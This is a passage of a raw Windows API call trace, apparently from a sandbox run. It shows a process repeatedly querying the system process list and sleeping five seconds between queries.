ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.440] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.461] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.549] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.665] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.686] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0215.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0215.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0215.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0215.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0215.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0215.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 